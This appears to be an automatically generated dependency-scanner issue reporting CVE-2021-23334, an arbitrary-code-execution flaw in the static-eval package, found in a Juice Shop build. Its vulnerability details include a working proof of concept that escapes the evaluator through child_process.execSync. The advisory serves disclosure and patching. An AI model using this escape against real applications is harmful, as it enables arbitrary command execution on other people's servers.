CVE-2021-23334 (High) detected in juice-shopjuice-shop-10.0.0_node10_darwin_x64 - autoclosed

[mend-bolt-for-github]

CVE-2021-23334 - High Severity Vulnerability

Vulnerable Library - juice-shopjuice-shop-10.0.0_node10_darwin_x64

Probably the most modern and sophisticated insecure web application

Library home page: https://sourceforge.net/projects/juice-shop/

Found in HEAD commit: 5ccb60ca750f54c2905e83ba7e30ac155d3fdf41

Found in base branch: main

Vulnerable Source Files (0)

Vulnerability Details

All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)

Publish Date: 2021-02-11

URL: CVE-2021-23334

CVSS 3 Score Details (9.8)

Base Score Metrics:

• Exploitability Metrics:
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
• Impact Metrics:
  • Confidentiality Impact: High
  • Integrity Impact: High
  • Availability Impact: High

For more information on CVSS3 Scores, click here.

---

Step up your Open Source Security Game with WhiteSource here

[mend-bolt-for-github]

✔️ This issue was automatically closed by WhiteSource because the vulnerable library in the specific branch(es) was either marked as ignored or it is no longer part of the WhiteSource inventory.